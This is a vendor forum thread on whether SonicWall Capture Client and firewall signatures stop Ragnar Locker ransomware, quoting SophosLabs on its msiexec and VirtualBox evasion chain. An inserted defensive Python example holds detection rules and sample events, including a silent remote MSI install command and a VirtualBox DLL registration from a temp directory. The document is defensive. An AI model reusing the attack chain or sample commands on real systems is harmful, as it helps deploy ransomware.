
Ragnar Locker ransomware

TomChou Newbie ✭

Can SonicWall Capture Client detect the new Ragnar Locker ransomware, which uses a clever trick to dodge detection?

https://tech.hindustantimes.com/tech/news/a-new-ransomware-uses-virtual-machine-to-dodge-security-71590409211492.html

Category: Capture Client

Best Answers

  • CORRECT ANSWER
    shiprasahu93 Moderator

    Hello @TomChou,

    We have confirmation from the SentinelOne team now. So, Capture Client general release 2.0.28 (running S1 version 3.6.6.104) as well as the latest release 3.0.11 (running S1 version 4.0.4.81) can both defend against the Ragnar Locker ransomware.

    So, the answer would be yes, you are completely protected against this ransomware attack if you have the updated client version.

    I hope that helps!

    Thanks!!

    Shipra Sahu

    Technical Support Advisor, Premier Services

  • CORRECT ANSWER
    KaranM Moderator

    Thank you @shiprasahu93

    Adding to this, as per SophosLabs: "Ragnar Locker works in a tricky way: the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server."

    "In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script. The script's first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys," the company added.

    SentinelOne's Dynamic Behavior engine will block any unsigned MSI/exe file from being executed and report it back to the console, hence we should detect this ransomware as well if you have the updated client version as recommended by Shipra.
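
As an added, defender-side illustration (not SonicWall's or SentinelOne's code, and not part of the original thread), the Python below turns the behaviour KaranM quotes from SophosLabs into three simple process-creation detection rules and runs them over constructed sample events: a silent msiexec install from a web URL, msiexec spawning an executable from an untrusted directory, and a VirtualBox component being registered from somewhere other than its normal install directory. The event fields (Sysmon-style Image/CommandLine/ParentImage), the rule names, and every sample path and address are assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation events (simplified and made up for
# this example; not real telemetry from any environment).
SAMPLE_EVENTS = [
    {   # msiexec pulling a package from a web server and installing it silently
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i http://203.0.113.10/pkg.msi /q",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {   # ordinary interactive install of a local package: benign
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\vendor.msi",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # installer dropping and launching an executable from a temp directory
        "Image": r"C:\Windows\Temp\va.exe",
        "CommandLine": r"va.exe",
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
    },
    {   # VirtualBox COM component being registered from a temp directory
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32 /S C:\Windows\Temp\VBoxC.dll",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # same component registered from VirtualBox's normal install dir: benign
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VBoxC.dll"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# Directories from which signed, installed software normally runs (assumption
# for the example; a real deployment would tune this list per environment).
TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows\system32")

# An .msi argument that points at a web server rather than a local path.
REMOTE_MSI = re.compile(r"https?://\S+\.msi\b", re.IGNORECASE)
# msiexec's quiet / no-UI switches.
QUIET_FLAG = re.compile(r"(?:^|\s)/(?:quiet|qn|qb|q)\b", re.IGNORECASE)
# Full path of one of the VirtualBox components named in the SophosLabs quote.
VBOX_COMPONENT_PATH = re.compile(
    r'([A-Za-z]:\\[^"]*?(?:VBoxC\.dll|VBoxRT\.dll|VBoxDrv\.sys))', re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _is_trusted_path(path):
    return path.lower().startswith(TRUSTED_PREFIXES)


def check_event(event):
    """Return the names of the rules a single event matches (empty if none)."""
    image, cmd, parent = event["Image"], event["CommandLine"], event["ParentImage"]
    hits = []
    # Rule 1: msiexec fetching a package over HTTP(S) and installing without UI.
    if _basename(image) == "msiexec.exe" and REMOTE_MSI.search(cmd) and QUIET_FLAG.search(cmd):
        hits.append("msiexec_remote_silent_install")
    # Rule 2: msiexec launching a child that lives outside trusted directories.
    if _basename(parent) == "msiexec.exe" and not _is_trusted_path(image):
        hits.append("msiexec_spawns_untrusted_child")
    # Rule 3: a VirtualBox DLL/driver referenced from outside its install directory.
    match = VBOX_COMPONENT_PATH.search(cmd)
    if match and not _is_trusted_path(match.group(1)):
        hits.append("virtualbox_component_outside_install_dir")
    return hits


def scan_events(events):
    """Run every rule over an event stream; returns (rule, command line) pairs."""
    return [(rule, ev["CommandLine"]) for ev in events for rule in check_event(ev)]


if __name__ == "__main__":
    for rule, cmd in scan_events(SAMPLE_EVENTS):
        print(f"{rule:42s} {cmd}")
```

Run on the constructed events, the scan flags the three suspicious events and stays silent on the two benign ones; each rule is deliberately narrow so that a legitimate VirtualBox installation under Program Files, or a user double-clicking a downloaded MSI, does not trigger it.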

  • CORRECT ANSWER
    TomChou Newbie ✭

    Thanks @shiprasahu93 & @KaranM for the answer. 🙂

Answers

  • Halon5 Newbie

    Now I'm interested to know if there is a GAV / IPS signature for this...? SW Team?

  • shiprasahu93 Moderator

    Hey @Halon5,

    That is an excellent question. I have already asked our IPS and GAV teams about this. I will update you as soon as I have that information.

    Thanks!!

    Shipra Sahu

    Technical Support Advisor, Premier Services

  • shiprasahu93 Moderator

    Hello @Halon5,

    I apologize for the late response. So, these are the signatures on the GAV engine on the firewall that protect against 'Ragnar Locker Ransomware':

    Covid.N_17

    Ragnar.DN

    I hope that helps!

    Thanks!!

    Shipra Sahu

    Technical Support Advisor, Premier Services
